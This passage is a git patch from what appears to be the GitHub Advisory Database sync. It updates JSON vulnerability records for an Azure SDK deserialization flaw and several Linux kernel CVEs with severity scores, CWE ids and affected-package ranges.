advisories/unreviewed/2026/02/GHSA-436v-jg82-p533/GHSA-436v-jg82-p533.json rename to advisories/github-reviewed/2026/02/GHSA-436v-jg82-p533/GHSA-436v-jg82-p533.json index f5ff61b20d2dd..3358747da2cc2 100644 --- a/advisories/unreviewed/2026/02/GHSA-436v-jg82-p533/GHSA-436v-jg82-p533.json +++ b/advisories/github-reviewed/2026/02/GHSA-436v-jg82-p533/GHSA-436v-jg82-p533.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-436v-jg82-p533", - "modified": "2026-02-10T18:30:42Z", + "modified": "2026-02-12T18:28:29Z", "published": "2026-02-10T18:30:42Z", "aliases": [ "CVE-2026-21531" ], + "summary": "Azure AI Language Authoring Elevation of Privilege Vulnerability can Lead to RCE", "details": "Deserialization of untrusted data in Azure SDK allows an unauthorized attacker to execute code over a network.", "severity": [ { @@ -13,12 +14,36 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "azure-ai-language-conversations-authoring" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.0.0b4" + } + ] + } + ] + } + ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21531" }, + { + "type": "PACKAGE", + "url": "https://github.com/Azure/azure-sdk-for-python" + }, { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21531" @@ -29,8 +54,8 @@ "CWE-502" ], "severity": "CRITICAL", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T18:28:29Z", "nvd_published_at": "2026-02-10T18:16:35Z" } } \ No newline at end of file From 2f5eac80446450eff30fddd5ceaf3334ec51a49f Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 18:32:54 +0000 Subject: [PATCH 042/215] Advisory Database Sync --- .../GHSA-3cqr-ghj9-p46w.json | 15 ++++-- .../GHSA-3pwq-c4jq-fp68.json | 15 ++++-- .../GHSA-449w-38pp-j3qp.json | 11 +++-- .../GHSA-44pm-q7mw-v83g.json | 15 ++++-- .../GHSA-4jf8-pxjc-f722.json | 11 +++-- .../GHSA-5576-c4r8-hvqj.json | 11 +++-- .../GHSA-5ww6-4m54-3jr9.json | 15 ++++-- .../GHSA-6v4x-gf5x-r6w5.json | 15 ++++-- .../GHSA-7qp5-4fvr-94mm.json | 15 ++++-- .../GHSA-cf4p-6xcv-jcrj.json | 11 +++-- .../GHSA-f95c-c99f-h2mq.json | 15 ++++-- .../GHSA-g32r-xv9q-pp8r.json | 15 ++++-- .../GHSA-h7p3-q878-x2pj.json | 15 ++++-- .../GHSA-j4wq-v2m2-959h.json | 15 ++++-- .../GHSA-jjx2-jhcm-j26c.json | 11 +++-- .../GHSA-jrv8-9m22-559m.json | 15 ++++-- .../GHSA-m48w-fr7p-r6p2.json | 11 +++-- .../GHSA-x2mg-85cj-xc8q.json | 15 ++++-- .../GHSA-2cqm-696m-6jx3.json | 6 ++- .../GHSA-972g-439m-qvrv.json | 6 ++- .../GHSA-jvf4-gm9f-33g9.json | 6 ++- .../GHSA-mrvc-5w25-h6c4.json | 6 ++- .../GHSA-wfx5-6vpf-vmpx.json | 6 ++- .../GHSA-2cmj-fc9r-6h5j.json | 15 ++++-- .../GHSA-2hr4-372m-m24q.json | 15 ++++-- .../GHSA-2jp6-x3f3-3m72.json | 11 +++-- .../GHSA-2jw9-xm3m-75jh.json | 15 ++++-- .../GHSA-2prw-jcj2-h5xf.json | 15 ++++-- .../GHSA-2x8h-ggxv-ww4j.json | 6 ++- .../GHSA-355c-f243-w6f5.json | 11 +++-- .../GHSA-377q-fc84-7fvf.json | 3 +- .../GHSA-3fcr-xq7p-rffp.json | 15 ++++-- .../GHSA-3qr2-wf7p-c9f8.json | 11 +++-- .../GHSA-3rgq-74p3-8xc5.json | 6 ++- .../GHSA-3wh2-2wc5-f45w.json | 6 ++- .../GHSA-3ww4-528c-xcv7.json | 15 ++++-- .../GHSA-3x5q-gxp5-wv27.json | 6 ++- .../GHSA-4gx8-h22x-pf65.json | 11 +++-- .../GHSA-649p-9q32-vwxc.json | 15 ++++-- .../GHSA-6r9h-3c6p-4chm.json | 15 ++++-- .../GHSA-7688-cfp6-gj62.json | 9 +++- .../GHSA-77vc-xm5w-w2vq.json | 33 +++++++++++++ .../GHSA-7p49-g593-x646.json | 37 ++++++++++++++ .../GHSA-8258-fr2h-jgx8.json | 33 +++++++++++++ .../GHSA-84wm-58x3-8fvc.json | 15 ++++-- .../GHSA-8cmp-jqmx-pj7w.json | 15 ++++-- .../GHSA-926h-3qgq-9w39.json | 15 ++++-- .../GHSA-96rf-whf9-r5vh.json | 15 ++++-- .../GHSA-99pv-pwgp-5cm5.json | 15 ++++-- .../GHSA-9v69-wg3m-pj38.json | 3 +- .../GHSA-9w8m-7cg3-7mh9.json | 36 ++++++++++++++ .../GHSA-c37x-p7mp-hh29.json | 15 ++++-- .../GHSA-c5gm-v7v7-vjx9.json | 11 +++-- .../GHSA-c6jr-3394-hq95.json | 33 +++++++++++++ .../GHSA-ccq3-qfjv-47q4.json | 36 ++++++++++++++ .../GHSA-cp3m-5wf6-4649.json | 6 ++- .../GHSA-f24m-jwf4-xpxc.json | 15 ++++-- .../GHSA-f6c8-c5qf-mj37.json | 3 +- .../GHSA-f7qx-wh9j-7278.json | 15 ++++-- .../GHSA-fcfm-mfmf-7xm3.json | 36 ++++++++++++++ .../GHSA-fmxw-gfwm-67w3.json | 6 ++- .../GHSA-fqf2-x743-9564.json | 11 +++-- .../GHSA-fr6m-j2m3-hgw4.json | 36 ++++++++++++++ .../GHSA-frmq-2cmp-gh32.json | 15 ++++-- .../GHSA-g32q-3228-m26p.json | 15 ++++-- .../GHSA-ghfm-hghj-9j75.json | 33 +++++++++++++ .../GHSA-gvjm-pmwp-75mw.json | 15 ++++-- .../GHSA-h9c8-jr46-gp7p.json | 15 ++++-- .../GHSA-hfj8-gv3c-fx7w.json | 40 ++++++++++++++++ .../GHSA-hfmq-6wjv-c7r3.json | 15 ++++-- .../GHSA-hjj6-wmh2-qhwj.json | 15 ++++-- .../GHSA-j33g-vgfm-6pxv.json | 33 +++++++++++++ .../GHSA-j8xr-3xqm-72rh.json | 48 +++++++++++++++++++ .../GHSA-m4mv-q6m2-24j4.json | 15 ++++-- .../GHSA-mg2x-vmw2-xm7h.json | 15 ++++-- .../GHSA-mw3g-2cmq-pj57.json | 11 +++-- .../GHSA-p773-8mf4-rjm5.json | 44 +++++++++++++++++ .../GHSA-pc38-57g8-39gg.json | 37 ++++++++++++++ .../GHSA-pcm2-mwj5-74rq.json | 3 +- .../GHSA-pj3r-q6m4-wfcw.json | 40 ++++++++++++++++ .../GHSA-pr6p-6x97-5c59.json | 15 ++++-- .../GHSA-q6v4-fwc8-3mpc.json | 6 ++- .../GHSA-qg96-wxg3-3x3h.json | 15 ++++-- .../GHSA-qr83-6r38-ch55.json | 29 +++++++++++ .../GHSA-r28c-wjwj-4xgv.json | 15 ++++-- .../GHSA-r647-2xmg-2cg7.json | 3 +- .../GHSA-r942-7mj9-p58w.json | 11 +++-- .../GHSA-rj79-m8w5-gpw8.json | 15 ++++-- .../GHSA-rmgp-99fm-wv32.json | 11 +++-- .../GHSA-v9g2-54rr-mxmg.json | 11 +++-- .../GHSA-vf98-8xxx-fp8w.json | 6 ++- .../GHSA-xmr6-mm5f-8mf2.json | 6 ++- .../GHSA-xp6f-p933-2gqg.json | 44 +++++++++++++++++ 93 files changed, 1283 insertions(+), 229 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-77vc-xm5w-w2vq/GHSA-77vc-xm5w-w2vq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7p49-g593-x646/GHSA-7p49-g593-x646.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8258-fr2h-jgx8/GHSA-8258-fr2h-jgx8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9w8m-7cg3-7mh9/GHSA-9w8m-7cg3-7mh9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c6jr-3394-hq95/GHSA-c6jr-3394-hq95.json create mode 100644 advisories/unreviewed/2026/02/GHSA-ccq3-qfjv-47q4/GHSA-ccq3-qfjv-47q4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fcfm-mfmf-7xm3/GHSA-fcfm-mfmf-7xm3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fr6m-j2m3-hgw4/GHSA-fr6m-j2m3-hgw4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-ghfm-hghj-9j75/GHSA-ghfm-hghj-9j75.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hfj8-gv3c-fx7w/GHSA-hfj8-gv3c-fx7w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j33g-vgfm-6pxv/GHSA-j33g-vgfm-6pxv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j8xr-3xqm-72rh/GHSA-j8xr-3xqm-72rh.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p773-8mf4-rjm5/GHSA-p773-8mf4-rjm5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pc38-57g8-39gg/GHSA-pc38-57g8-39gg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pj3r-q6m4-wfcw/GHSA-pj3r-q6m4-wfcw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qr83-6r38-ch55/GHSA-qr83-6r38-ch55.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xp6f-p933-2gqg/GHSA-xp6f-p933-2gqg.json diff --git a/advisories/unreviewed/2025/10/GHSA-3cqr-ghj9-p46w/GHSA-3cqr-ghj9-p46w.json b/advisories/unreviewed/2025/10/GHSA-3cqr-ghj9-p46w/GHSA-3cqr-ghj9-p46w.json index 81937c994b90d..057923b6fc715 100644 --- a/advisories/unreviewed/2025/10/GHSA-3cqr-ghj9-p46w/GHSA-3cqr-ghj9-p46w.json +++ b/advisories/unreviewed/2025/10/GHSA-3cqr-ghj9-p46w/GHSA-3cqr-ghj9-p46w.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-3cqr-ghj9-p46w", - "modified": "2025-10-04T18:31:14Z", + "modified": "2026-02-12T18:30:18Z", "published": "2025-10-04T18:31:14Z", "aliases": [ "CVE-2023-53544" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ncpufreq: davinci: Fix clk use after free\n\nThe remove function first frees the clks and only then calls\ncpufreq_unregister_driver(). If one of the cpufreq callbacks is called\njust before cpufreq_unregister_driver() is run, the freed clks might be\nused.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -32,8 +37,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-10-04T16:15:49Z" diff --git a/advisories/unreviewed/2025/10/GHSA-3pwq-c4jq-fp68/GHSA-3pwq-c4jq-fp68.json b/advisories/unreviewed/2025/10/GHSA-3pwq-c4jq-fp68/GHSA-3pwq-c4jq-fp68.json index 139c991480e93..72eca6535d442 100644 --- a/advisories/unreviewed/2025/10/GHSA-3pwq-c4jq-fp68/GHSA-3pwq-c4jq-fp68.json +++ b/advisories/unreviewed/2025/10/GHSA-3pwq-c4jq-fp68/GHSA-3pwq-c4jq-fp68.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-3pwq-c4jq-fp68", - "modified": "2025-10-04T18:31:15Z", + "modified": "2026-02-12T18:30:19Z", "published": "2025-10-04T18:31:15Z", "aliases": [ "CVE-2023-53564" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nocfs2: fix defrag path triggering jbd2 ASSERT\n\ncode path:\n\nocfs2_ioctl_move_extents\n ocfs2_move_extents\n ocfs2_defrag_extent\n __ocfs2_move_extent\n + ocfs2_journal_access_di\n + ocfs2_split_extent //sub-paths call jbd2_journal_restart\n + ocfs2_journal_dirty //crash by jbs2 ASSERT\n\ncrash stacks:\n\nPID: 11297 TASK: ffff974a676dcd00 CPU: 67 COMMAND: \"defragfs.ocfs2\"\n #0 [ffffb25d8dad3900] machine_kexec at ffffffff8386fe01\n #1 [ffffb25d8dad3958] __crash_kexec at ffffffff8395959d\n #2 [ffffb25d8dad3a20] crash_kexec at ffffffff8395a45d\n #3 [ffffb25d8dad3a38] oops_end at ffffffff83836d3f\n #4 [ffffb25d8dad3a58] do_trap at ffffffff83833205\n #5 [ffffb25d8dad3aa0] do_invalid_op at ffffffff83833aa6\n #6 [ffffb25d8dad3ac0] invalid_op at ffffffff84200d18\n [exception RIP: jbd2_journal_dirty_metadata+0x2ba]\n RIP: ffffffffc09ca54a RSP: ffffb25d8dad3b70 RFLAGS: 00010207\n RAX: 0000000000000000 RBX: ffff9706eedc5248 RCX: 0000000000000000\n RDX: 0000000000000001 RSI: ffff97337029ea28 RDI: ffff9706eedc5250\n RBP: ffff9703c3520200 R8: 000000000f46b0b2 R9: 0000000000000000\n R10: 0000000000000001 R11: 00000001000000fe R12: ffff97337029ea28\n R13: 0000000000000000 R14: ffff9703de59bf60 R15: ffff9706eedc5250\n ORIG_RAX: ffffffffffffffff CS: 0010 SS: 0018\n #7 [ffffb25d8dad3ba8] ocfs2_journal_dirty at ffffffffc137fb95 [ocfs2]\n #8 [ffffb25d8dad3be8] __ocfs2_move_extent at ffffffffc139a950 [ocfs2]\n #9 [ffffb25d8dad3c80] ocfs2_defrag_extent at ffffffffc139b2d2 [ocfs2]\n\nAnalysis\n\nThis bug has the same root cause of 'commit 7f27ec978b0e (\"ocfs2: call\nocfs2_journal_access_di() before ocfs2_journal_dirty() in\nocfs2_write_end_nolock()\")'. For this bug, jbd2_journal_restart() is\ncalled by ocfs2_split_extent() during defragmenting.\n\nHow to fix\n\nFor ocfs2_split_extent() can handle journal operations totally by itself. \nCaller doesn't need to call journal access/dirty pair, and caller only\nneeds to call journal start/stop pair. The fix method is to remove\njournal access/dirty from __ocfs2_move_extent().\n\nThe discussion for this patch:\nhttps://oss.oracle.com/pipermail/ocfs2-devel/2023-February/000647.html", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -48,8 +53,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-617" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-10-04T16:15:51Z" diff --git a/advisories/unreviewed/2025/10/GHSA-449w-38pp-j3qp/GHSA-449w-38pp-j3qp.json b/advisories/unreviewed/2025/10/GHSA-449w-38pp-j3qp/GHSA-449w-38pp-j3qp.json index fb95dcb6b8c41..cd87b179918ad 100644 --- a/advisories/unreviewed/2025/10/GHSA-449w-38pp-j3qp/GHSA-449w-38pp-j3qp.json +++ b/advisories/unreviewed/2025/10/GHSA-449w-38pp-j3qp/GHSA-449w-38pp-j3qp.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-449w-38pp-j3qp", - "modified": "2025-10-04T18:31:15Z", + "modified": "2026-02-12T18:30:18Z", "published": "2025-10-04T18:31:15Z", "aliases": [ "CVE-2023-53558" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nrcu-tasks: Avoid pr_info() with spin lock in cblist_init_generic()\n\npr_info() is called with rtp->cbs_gbl_lock spin lock locked. Because\npr_info() calls printk() that might sleep, this will result in BUG\nlike below:\n\n[ 0.206455] cblist_init_generic: Setting adjustable number of callback queues.\n[ 0.206463]\n[ 0.206464] =============================\n[ 0.206464] [ BUG: Invalid wait context ]\n[ 0.206465] 5.19.0-00428-g9de1f9c8ca51 #5 Not tainted\n[ 0.206466] -----------------------------\n[ 0.206466] swapper/0/1 is trying to lock:\n[ 0.206467] ffffffffa0167a58 (&port_lock_key){....}-{3:3}, at: serial8250_console_write+0x327/0x4a0\n[ 0.206473] other info that might help us debug this:\n[ 0.206473] context-{5:5}\n[ 0.206474] 3 locks held by swapper/0/1:\n[ 0.206474] #0: ffffffff9eb597e0 (rcu_tasks.cbs_gbl_lock){....}-{2:2}, at: cblist_init_generic.constprop.0+0x14/0x1f0\n[ 0.206478] #1: ffffffff9eb579c0 (console_lock){+.+.}-{0:0}, at: _printk+0x63/0x7e\n[ 0.206482] #2: ffffffff9ea77780 (console_owner){....}-{0:0}, at: console_emit_next_record.constprop.0+0x111/0x330\n[ 0.206485] stack backtrace:\n[ 0.206486] CPU: 0 PID: 1 Comm: swapper/0 Not tainted 5.19.0-00428-g9de1f9c8ca51 #5\n[ 0.206488] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-1.fc36 04/01/2014\n[ 0.206489] Call Trace:\n[ 0.206490] \n[ 0.206491] dump_stack_lvl+0x6a/0x9f\n[ 0.206493] __lock_acquire.cold+0x2d7/0x2fe\n[ 0.206496] ? stack_trace_save+0x46/0x70\n[ 0.206497] lock_acquire+0xd1/0x2f0\n[ 0.206499] ? serial8250_console_write+0x327/0x4a0\n[ 0.206500] ? __lock_acquire+0x5c7/0x2720\n[ 0.206502] _raw_spin_lock_irqsave+0x3d/0x90\n[ 0.206504] ? serial8250_console_write+0x327/0x4a0\n[ 0.206506] serial8250_console_write+0x327/0x4a0\n[ 0.206508] console_emit_next_record.constprop.0+0x180/0x330\n[ 0.206511] console_unlock+0xf7/0x1f0\n[ 0.206512] vprintk_emit+0xf7/0x330\n[ 0.206514] _printk+0x63/0x7e\n[ 0.206516] cblist_init_generic.constprop.0.cold+0x24/0x32\n[ 0.206518] rcu_init_tasks_generic+0x5/0xd9\n[ 0.206522] kernel_init_freeable+0x15b/0x2a2\n[ 0.206523] ? rest_init+0x160/0x160\n[ 0.206526] kernel_init+0x11/0x120\n[ 0.206527] ret_from_fork+0x1f/0x30\n[ 0.206530] \n[ 0.207018] cblist_init_generic: Setting shift to 1 and lim to 1.\n\nThis patch moves pr_info() so that it is called without\nrtp->cbs_gbl_lock locked.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -29,7 +34,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-10-04T16:15:51Z" diff --git a/advisories/unreviewed/2025/10/GHSA-44pm-q7mw-v83g/GHSA-44pm-q7mw-v83g.json b/advisories/unreviewed/2025/10/GHSA-44pm-q7mw-v83g/GHSA-44pm-q7mw-v83g.json index b73529d55ef81..998d52412f768 100644 --- a/advisories/unreviewed/2025/10/GHSA-44pm-q7mw-v83g/GHSA-44pm-q7mw-v83g.json +++ b/advisories/unreviewed/2025/10/GHSA-44pm-q7mw-v83g/GHSA-44pm-q7mw-v83g.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-44pm-q7mw-v83g", - "modified": "2025-10-04T18:31:15Z", + "modified": "2026-02-12T18:30:18Z", "published": "2025-10-04T18:31:15Z", "aliases": [ "CVE-2023-53561" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: wwan: iosm: fix NULL pointer dereference when removing device\n\nIn suspend and resume cycle, the removal and rescan of device ends\nup in NULL pointer dereference.\n\nDuring driver initialization, if the ipc_imem_wwan_channel_init()\nfails to get the valid device capabilities it returns an error and\nfurther no resource (wwan struct) will be allocated. Now in this\nsituation if driver removal procedure is initiated it would result\nin NULL pointer exception since unallocated wwan struct is dereferenced\ninside ipc_wwan_deinit().\n\nipc_imem_run_state_worker() to handle the called functions return value\nand to release the resource in failure case. It also reports the link\ndown event in failure cases. The user space application can handle this\nevent to do a device reset for restoring the device communication.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-476" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-10-04T16:15:51Z" diff --git a/advisories/unreviewed/2025/10/GHSA-4jf8-pxjc-f722/GHSA-4jf8-pxjc-f722.json b/advisories/unreviewed/2025/10/GHSA-4jf8-pxjc-f722/GHSA-4jf8-pxjc-f722.json index 7dffd6bd37d92..d567a5c4a1199 100644 --- a/advisories/unreviewed/2025/10/GHSA-4jf8-pxjc-f722/GHSA-4jf8-pxjc-f722.json +++ b/advisories/unreviewed/2025/10/GHSA-4jf8-pxjc-f722/GHSA-4jf8-pxjc-f722.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-4jf8-pxjc-f722", - "modified": "2025-10-04T18:31:15Z", + "modified": "2026-02-12T18:30:18Z", "published": "2025-10-04T18:31:15Z", "aliases": [ "CVE-2023-53557" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nfprobe: Release rethook after the ftrace_ops is unregistered\n\nWhile running bpf selftests it's possible to get following fault:\n\n general protection fault, probably for non-canonical address \\\n 0x6b6b6b6b6b6b6b6b: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC NOPTI\n ...\n Call Trace:\n \n fprobe_handler+0xc1/0x270\n ? __pfx_bpf_testmod_init+0x10/0x10\n ? __pfx_bpf_testmod_init+0x10/0x10\n ? bpf_fentry_test1+0x5/0x10\n ? bpf_fentry_test1+0x5/0x10\n ? bpf_testmod_init+0x22/0x80\n ? do_one_initcall+0x63/0x2e0\n ? rcu_is_watching+0xd/0x40\n ? kmalloc_trace+0xaf/0xc0\n ? do_init_module+0x60/0x250\n ? __do_sys_finit_module+0xac/0x120\n ? do_syscall_64+0x37/0x90\n ? entry_SYSCALL_64_after_hwframe+0x72/0xdc\n \n\nIn unregister_fprobe function we can't release fp->rethook while it's\npossible there are some of its users still running on another cpu.\n\nMoving rethook_free call after fp->ops is unregistered with\nunregister_ftrace_function call.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -29,7 +34,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-10-04T16:15:51Z" diff --git a/advisories/unreviewed/2025/10/GHSA-5576-c4r8-hvqj/GHSA-5576-c4r8-hvqj.json b/advisories/unreviewed/2025/10/GHSA-5576-c4r8-hvqj/GHSA-5576-c4r8-hvqj.json index 83ec1621f3a58..a3a8dc4279c82 100644 --- a/advisories/unreviewed/2025/10/GHSA-5576-c4r8-hvqj/GHSA-5576-c4r8-hvqj.json +++ b/advisories/unreviewed/2025/10/GHSA-5576-c4r8-hvqj/GHSA-5576-c4r8-hvqj.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-5576-c4r8-hvqj", - "modified": "2025-10-04T18:31:15Z", + "modified": "2026-02-12T18:30:19Z", "published": "2025-10-04T18:31:15Z", "aliases": [ "CVE-2023-53569" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\next2: Check block size validity during mount\n\nCheck that log of block size stored in the superblock has sensible\nvalue. Otherwise the shift computing the block size can overflow leading\nto undefined behavior.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -49,7 +54,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-10-04T16:15:52Z" diff --git a/advisories/unreviewed/2025/10/GHSA-5ww6-4m54-3jr9/GHSA-5ww6-4m54-3jr9.json b/advisories/unreviewed/2025/10/GHSA-5ww6-4m54-3jr9/GHSA-5ww6-4m54-3jr9.json index 3355f2b7e639e..92a574f08d0d1 100644 --- a/advisories/unreviewed/2025/10/GHSA-5ww6-4m54-3jr9/GHSA-5ww6-4m54-3jr9.json +++ b/advisories/unreviewed/2025/10/GHSA-5ww6-4m54-3jr9/GHSA-5ww6-4m54-3jr9.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-5ww6-4m54-3jr9", - "modified": "2025-10-04T18:31:14Z", + "modified": "2026-02-12T18:30:18Z", "published": "2025-10-04T18:31:14Z", "aliases": [ "CVE-2023-53543" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nvdpa: Add max vqp attr to vdpa_nl_policy for nlattr length check\n\nThe vdpa_nl_policy structure is used to validate the nlattr when parsing\nthe incoming nlmsg. It will ensure the attribute being described produces\na valid nlattr pointer in info->attrs before entering into each handler\nin vdpa_nl_ops.\n\nThat is to say, the missing part in vdpa_nl_policy may lead to illegal\nnlattr after parsing, which could lead to OOB read just like CVE-2023-3773.\n\nThis patch adds the missing nla_policy for vdpa max vqp attr to avoid\nsuch bugs.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-10-04T16:15:49Z" diff --git a/advisories/unreviewed/2025/10/GHSA-6v4x-gf5x-r6w5/GHSA-6v4x-gf5x-r6w5.json b/advisories/unreviewed/2025/10/GHSA-6v4x-gf5x-r6w5/GHSA-6v4x-gf5x-r6w5.json index 5c10d1c40ec1f..96ad5ee3d7013 100644 --- a/advisories/unreviewed/2025/10/GHSA-6v4x-gf5x-r6w5/GHSA-6v4x-gf5x-r6w5.json +++ b/advisories/unreviewed/2025/10/GHSA-6v4x-gf5x-r6w5/GHSA-6v4x-gf5x-r6w5.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-6v4x-gf5x-r6w5", - "modified": "2025-10-04T18:31:15Z", + "modified": "2026-02-12T18:30:18Z", "published": "2025-10-04T18:31:15Z", "aliases": [ "CVE-2023-53559" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nip_vti: fix potential slab-use-after-free in decode_session6\n\nWhen ip_vti device is set to the qdisc of the sfb type, the cb field\nof the sent skb may be modified during enqueuing. Then,\nslab-use-after-free may occur when ip_vti device sends IPv6 packets.\nAs commit f855691975bb (\"xfrm6: Fix the nexthdr offset in\n_decode_session6.\") showed, xfrm_decode_session was originally intended\nonly for the receive path. IP6CB(skb)->nhoff is not set during\ntransmission. Therefore, set the cb field in the skb to 0 before\nsending packets.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -48,8 +53,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-10-04T16:15:51Z" diff --git a/advisories/unreviewed/2025/10/GHSA-7qp5-4fvr-94mm/GHSA-7qp5-4fvr-94mm.json b/advisories/unreviewed/2025/10/GHSA-7qp5-4fvr-94mm/GHSA-7qp5-4fvr-94mm.json index f0f0a4227c569..1bf4a00019ea5 100644 --- a/advisories/unreviewed/2025/10/GHSA-7qp5-4fvr-94mm/GHSA-7qp5-4fvr-94mm.json +++ b/advisories/unreviewed/2025/10/GHSA-7qp5-4fvr-94mm/GHSA-7qp5-4fvr-94mm.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-7qp5-4fvr-94mm", - "modified": "2025-10-04T18:31:15Z", + "modified": "2026-02-12T18:30:18Z", "published": "2025-10-04T18:31:15Z", "aliases": [ "CVE-2023-53555" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/damon/core: initialize damo_filter->list from damos_new_filter()\n\ndamos_new_filter() is not initializing the list field of newly allocated\nfilter object. However, DAMON sysfs interface and DAMON_RECLAIM are not\ninitializing it after calling damos_new_filter(). As a result, accessing\nuninitialized memory is possible. Actually, adding multiple DAMOS filters\nvia DAMON sysfs interface caused NULL pointer dereferencing. Initialize\nthe field just after the allocation from damos_new_filter().", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-908" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-10-04T16:15:50Z" diff --git a/advisories/unreviewed/2025/10/GHSA-cf4p-6xcv-jcrj/GHSA-cf4p-6xcv-jcrj.json b/advisories/unreviewed/2025/10/GHSA-cf4p-6xcv-jcrj/GHSA-cf4p-6xcv-jcrj.json index 